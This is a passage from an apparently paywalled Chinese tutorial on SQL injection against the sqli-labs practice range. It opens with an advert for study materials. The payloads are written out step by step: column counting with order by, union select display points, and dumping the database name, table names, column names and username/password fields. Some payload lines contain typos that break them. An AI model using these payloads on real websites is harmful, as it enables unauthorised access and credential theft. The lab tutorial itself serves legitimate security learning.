网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
order by 1 --+
三、判断数据显示点
?id=-1’ union select 1,2,3 --+ //可以把注入点改为负数或零达到注释前半段语句的效果
四、显示用户和数据库名
?id=-1 select 1,user(),databese() --+
五、查看所有表
union select 1,(select group_concat(table_name)form information_schema.tables where table_schema='数据库名'),3 --+
六、查看表里的所有列
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='数据库' and table_name='表名'),3 --+
七、查看字段值
union select 1,(select group_concat(user,pass) from users), 3 --+
4.sqli_labs靶场
一、数字型注入:
传入id=1进行查找注入点,发现页面回显正常
半段注入类型,?id=1-2发现页面无回显,因为表达式传入sql语句中进行了运算,结果为假所以没有回显,类型为数字型注入
使用order by进行判断字段数,4的时候报错说明字段数为3 使用–+来注释后面的语句
发现回显位为2和3,使用union连接sql语句 id=-1注释前面多余语句
查询数据库版本号和当前数据库名
查询security库下面有哪些表
最低0.47元/天 解锁文章
扫一扫
9470
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
